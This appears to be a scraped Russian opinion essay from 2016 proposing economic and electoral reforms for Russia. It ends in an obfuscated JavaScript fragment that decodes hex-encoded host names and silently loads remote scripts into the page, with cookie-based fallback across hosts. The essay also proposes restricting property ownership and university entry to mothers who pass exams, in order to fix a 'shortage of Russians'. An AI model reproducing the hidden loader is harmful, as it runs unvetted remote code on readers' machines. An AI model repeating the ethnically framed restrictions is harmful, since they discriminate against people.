"Зачем и как поднимать экономику России" Михаил Галахов

Зачем и как поднимать экономику России
Михаил Галахов
23 июня 2016 1
Экономика для народа, а не народ для экономики

                ЗАЧЕМ И КАК ПОДНИМАТЬ ЭКОНОМИКУ РОССИИ?

 

  1. Что такое экономика?  Экономика = система жизнеобеспечения народа с целью его сбережения и размножения. Власть лет 30 не объявляет цели, и народу непонятно, зачем работать. Вместо экономики в РФии хрематистика (хремастика) (ещё Аристотель) = активность в добыче денег из общей для страны денежной массы. Власть показала на себе (делай, как я), как обогащаться, грабя страну и обирая народ, и большая часть народа охотно или по необходимости последовала примеру власти. В нормальной экономике сначала что-то создают и потом за это получают деньги. В хремастике РФии народ направили на добычу денег, о деле можно и забыть.

 

  1. Стремиться надо не к росту ВВП (его можно сильно увеличить, продавая страну по кускам (долям-акциям)), а к росту долгосрочных благосостояния и безопасности населения. Инфляция не страшна, если рост цен сопровождается более или менее пропорциональным ростом доходов. Заявления ЦБ о борьбе с инфляцией смешны: ЦБ не мешает росту монопольных цен и вместе с правительством подавляет платёжеспособный спрос народа на необходимое для жизни и тем самым производство этого необходимого (в эту же сторону работает огромный банковский процент) с сопутствующей дефициту инфляцией.

 

  1. Власть (от ВВП до силюкаевых) лет 15 говорит: надо повышать, укреплять, развивать, производить…). Под эти разговоры практически ничего не сделано.

Создаётся впечатление, что болтовня = операция прикрытия для личного обогащения верхов.  Дело в том, что конкретному человеку надо (власть приучила) добыть денег, и многие преуспели добывать миллионы рублей в день, обирая по закону сохранения миллионы людей. Управление же экономикой сводится к управлению потоками денег (хремастике), что напоминает управлением потоком воды в решете или в водопроводе с дырявыми трубами. Деньги устойчиво растекаются по личным большим карманам, включая почти бездонные зарубежные. Ничего хорошего не будет, если не перекрыть утечки и откачки денег в большие карманы.

 

      4.   Что делать? Перекрыть основные каналы утечки денег (за рубеж протекционизмом

            и в карманы сверхбогачей налогом). Тогда для добычи денег придётся сделать

           что-то полезное. И деньги будут «работать» в РФии.

 

      5.  Сколько платить?                                

              Каждому платить 1 + (k – 1)Дпi/Дпmax минимумов.

             Это справедливый социалистический капитализм

Дпi потенциальный доход человека = доход + 3% годовых от избыточного имущества, i номер человека, Дпmax максимальный потенциальный доход, коэффициент расслоения, рекомендуется начать со 100. Минимум находится из закона сохранения. Оценочные числа: минимум 5Крублей в месяц, максимум 500К.

   Плюсы: 1) есть мотивация добывать имущество и деньги, 2) обогащаться можно только вместе с обществом, а не вместо него, 3) социальная справедливость повышает общественную безопасность, 4) размножение и сбережение народа, ибо минимум платится новорождённому и старику (ему можно до 10 минимумов). К собственноси и в вузы допускать только матерей после сдачи русского и математики: это решит проблему дефицита русских. Пенсию женщинам с 70и. 5) все заинтересованы в реализации денег в необходимое для жизни.  

       6. Выборы только ступенчатые, чтобы депутатом Думы мог стать только прошедший все уровни от депутата сельсовета, района, области с опытом работы на каждом уровне не менее года. Так в Армии и Церкви.

 

       7. Протекционизм, чтобы научиться работать и окрепнуть. Так поступали Британия и США.

 

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>